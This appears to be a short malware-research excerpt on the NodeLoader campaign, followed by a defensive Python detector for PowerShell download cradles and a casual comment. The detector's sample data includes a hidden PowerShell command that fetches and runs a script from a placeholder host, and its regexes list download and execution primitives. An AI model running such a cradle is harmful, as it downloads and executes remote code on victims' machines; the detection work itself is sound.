Key Takeaways
- ThreatLabz has observed threat actors deploying NodeLoader using the Node Package Manager (NPM) pkg module to turn Node.js code into standalone Windows executable files for malicious purposes.
- The threat actors employ social engineering and evasion techniques to deliver NodeLoader undetected.
- NodeLoader uses a module called sudo-prompt, a publicly available tool on GitHub and NPM, for privilege escalation.
- The malware delivered by NodeLoader includes cryptocurrency miners and information stealers.
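Detection-side view of the chain the takeaways describe (a bundled executable that hands off to a PowerShell download-and-execute stage), as an added example that is not part of the ThreatLabz report: a small Python checker over constructed process-creation events. The expected-parent set, the event fields, and every path and URL below are assumptions made up for the example, not values from the report.

```python
"""Added detection example (not ThreatLabz/Zscaler code): flag process-creation
events in which an executable outside the usual set of shells and launchers
spawns PowerShell with a download-and-execute command line.
Event shape, parent allow-list and all sample values are constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line of the created process


# Parents from which a PowerShell launch is routine on a workstation.
# Assumption for the example; tune to the environment being monitored.
EXPECTED_PARENTS = {
    r"c:\windows\explorer.exe",
    r"c:\windows\system32\cmd.exe",
    r"c:\windows\system32\services.exe",
}

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Fetch primitives commonly seen in one-line download cradles.
DOWNLOAD_TOKENS = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"downloadfile|net\.webclient|\bcurl\b|\bwget\b|start-bitstransfer",
    re.IGNORECASE,
)
# Primitives that turn fetched text into running code.
EXECUTE_TOKENS = re.compile(
    r"invoke-expression|\biex\b|-encodedcommand|\s-e(?:nc|c)?\s|start-process",
    re.IGNORECASE,
)
# Launch flags that hide the window or skip profile/policy checks.
HIDDEN_TOKENS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(ev: ProcEvent) -> list[str]:
    """Return the reasons this event looks suspicious (empty if none).
    Only PowerShell launches are scored; other images return []."""
    if basename(ev.image) not in POWERSHELL_IMAGES:
        return []
    reasons = []
    if ev.parent_image.lower() not in EXPECTED_PARENTS:
        reasons.append(f"unexpected parent {ev.parent_image}")
    if DOWNLOAD_TOKENS.search(ev.command_line):
        reasons.append("download primitive in command line")
    if EXECUTE_TOKENS.search(ev.command_line):
        reasons.append("execution primitive in command line")
    if HIDDEN_TOKENS.search(ev.command_line):
        reasons.append("hidden/no-profile launch flags")
    return reasons


def is_download_cradle(ev: ProcEvent) -> bool:
    """Core signal: fetch + execute in one PowerShell command line, launched
    from a parent that is not an expected shell or launcher."""
    reasons = analyze(ev)
    return (
        any(r.startswith("unexpected parent") for r in reasons)
        and "download primitive in command line" in reasons
        and "execution primitive in command line" in reasons
    )


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry (Sysmon-style fields, invented values).
SAMPLE_EVENTS = [
    # A bundled launcher in a user-writable path spawns a hidden PowerShell
    # that fetches and runs a script from a placeholder host.
    ProcEvent(r"C:\Users\alice\Downloads\GameBooster.exe", PS_IMAGE,
              'powershell.exe -nop -w hidden -c "iex (iwr http://example.invalid/s.ps1).Content"'),
    # A user opens an interactive shell from Explorer.
    ProcEvent(r"C:\Windows\explorer.exe", PS_IMAGE, "powershell.exe"),
    # An unknown parent runs PowerShell without any fetch or execute primitive.
    ProcEvent(r"C:\Program Files\Example\updater.exe", PS_IMAGE,
              'powershell.exe -c "Get-Date"'),
]


def flagged(events: list[ProcEvent] = SAMPLE_EVENTS) -> list[str]:
    """Parent images of the events that match the download-cradle rule."""
    return [ev.parent_image for ev in events if is_download_cradle(ev)]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(basename(ev.parent_image), "->", analyze(ev))
    print("flagged:", flagged())
```

The rule deliberately keys on the combination of an unexpected parent with both a fetch and an execute primitive, so an administrator pasting a one-liner into an Explorer-launched console is not flagged; the hidden-window and no-profile flags are recorded as supporting context rather than as a trigger on their own.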
Lmao they just use node to download a PowerShell script and run it.